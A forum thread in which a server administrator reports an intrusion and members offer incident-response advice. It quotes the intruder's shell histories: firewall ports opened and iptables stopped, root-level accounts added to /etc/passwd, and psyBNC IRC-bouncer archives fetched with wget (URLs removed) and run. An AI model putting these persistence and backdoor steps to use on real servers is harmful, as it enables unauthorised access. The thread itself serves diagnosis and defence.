Two hackcheck notice email

reficul

Member
Dec 15, 2008
19
0
51
Italy
cPanel Access Level
Root Administrator
[hackcheck] mysqli has a uid 0 account
[hackcheck] services has a uid 0 account

History command report this activity

1 cat /etc/ssh/sshd_config
2 exit
3 whereis gcc
4 chmod +x /usr/bin/gcc
5 exit
6 service iptables status
7 service iptables stop
8 whereis iptables
9 whereis irc
10 iptables -L -v
11 iptables -L
12 service iptables start
13 iptables -A INPUT -p tcp --dport 6667 -j ACCEPT
14 iptables -A INPUT -p tcp --dport 1234 -j ACCEPT
15 iptables-save
16 service iptables start
17 iptables -A INPUT -p tcp --dport 2345 -j ACCEPT
18 iptables-save
19 iptables -A INPUT -p tcp --dport 2345 -j ACCEPT
20 service iptables save
21 iptables -A INPUT -p tcp --dport 31337 -j ACCEPT
22 service iptables save
23 iptables-save
24 exit
25 service iptables stop
26 exit
27 service oidentd start
28 cat ssstt
29 cd com
30 service iptables stop
31 whereis oidentd
32 /usr/sbin/oidentd start
33 service oidentd start
34 ps -e
35 kill -9 29521
36 ps -e
37 service iptables stop
38 service iptables stop
39 exit
what to do?
 

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
Is this a VPS or server you're running? If it's a webserver, could be a script or configuration error. But if it's a VPS, I'd assume you may have been breached :-/ Do you have root access over the server?
 

reficul

Member
Dec 15, 2008
19
0
51
Italy
cPanel Access Level
Root Administrator
It's a dedicated Server. After I remove the two string from passwd,
As yesterday, at 2.59am the two strings

services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash

added again in the etc/passwd file.

and I find also:

sgl:x:32008:32010::/home/sgl:/bin/bash

Some strange files in home/sgl like:
psybiru.tar.gz
 

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
Ouch. You have been breached. Getting any random calls from this domain?

-removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. it translates to http[colon]3xploit.110mb.com

psybiru.tar.gz is an IP shell, lets you use IRC through it, aka a BNC server. Disaster recover time...

These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do :)

1. Backup your web-data locally immediately
2. Change all of your passwords - ftp, web, mail etc.. In fact, kill FTP altogether if you can to be safe.
3. Make sure any non-cpanel scripts are updated, if you can, term them too.
4. Go to your rap ip logs, turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user setup somewhere with vulnerable permissions.
5. BLOCK anything from 110mb.com. It is 1 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little bit of time for you to examine the logs.

Are you running webdav? Again, if you can turn it off, do so. The webdav exploit isn't new, but it's been popping up again on the underground forums.. wierd how old stuff can come back to bite ya, huh? Oh ya, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.

If you can figure out if you have any IRC/BNC connections and what the source IP's are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off..
 
Last edited by a moderator:

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
Reported to 110mb.com. They take care of this stuff pretty quick, but take care of your situation ASAP! Feel free to let me know if you need help, I'll be around for a couple more hours if you need anything (applies to anyone else having an issue with this)- Just checked, this domain has been around for a bit.. wierd.
 

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
Glad to see your head is in the right place - Remember, your backups will likely be infected to some degree as well. don't just pop them right back up without some proper analysis..
 

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
You can either block the FQDN (fully qualified domain name) or a single IP, or a range. In this case, I would block a range (10.12.12.1-10.12.13.1), since 110mb is a shared host, and a popular one at that. Use the IP Deny Manager in cPanel.
 

reficul

Member
Dec 15, 2008
19
0
51
Italy
cPanel Access Level
Root Administrator
.bash_history on the fake user:

Code:
id
sudo -i
hostname
w
logout
cat /etc/ssh/sshd_config
sudo -i
id
w
wget -removed url-
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make menuconfig
sudo -i
make menuconfig
whereis ld
make menuconfig
make
ls -al
pwd
pico psybncchk
./psybnc
kill -9 24536
ps -c
ls -al
cat psybnc.conf
pico psybnc.conf
./psybnc
ps -c
./psybnc
ps -c
cd
ls -al
wget -removed url-  -zxvf psybiru.tar.gz
cd components/
./config 1234;./****************;./run
cd scripts
rm -rf DEFAULT.SCRIPT
wget -removed url-
cd
logout
sudo
sudo -i
ls -al
ps -c
ps -x
killall -9 psybnc
cd psybnc
./psybnc
cat psybnc.conf
ps -c
pwd
killall -9 psybnc
pico psybnc.conf
./psybnc
pico psybnc.conf
killall -9 psybnc
pico psybnc.conf
./psybnc
sudo -i
cd
killall -9 psybnc
ls -al
cd components
ls -al
pico psybnc.conf
pico ssstt
rm -rf ssstt
ps -x
killall -9 psybnc
killall -9 psybnc
 
Last edited by a moderator:

cPanelTristan

Quality Assurance Analyst
Staff member
Oct 2, 2010
7,607
40
248
somewhere over the rainbow
cPanel Access Level
Root Administrator
Do you mean it is wordpress, because exim cannot execute commands that would cause this type of issue.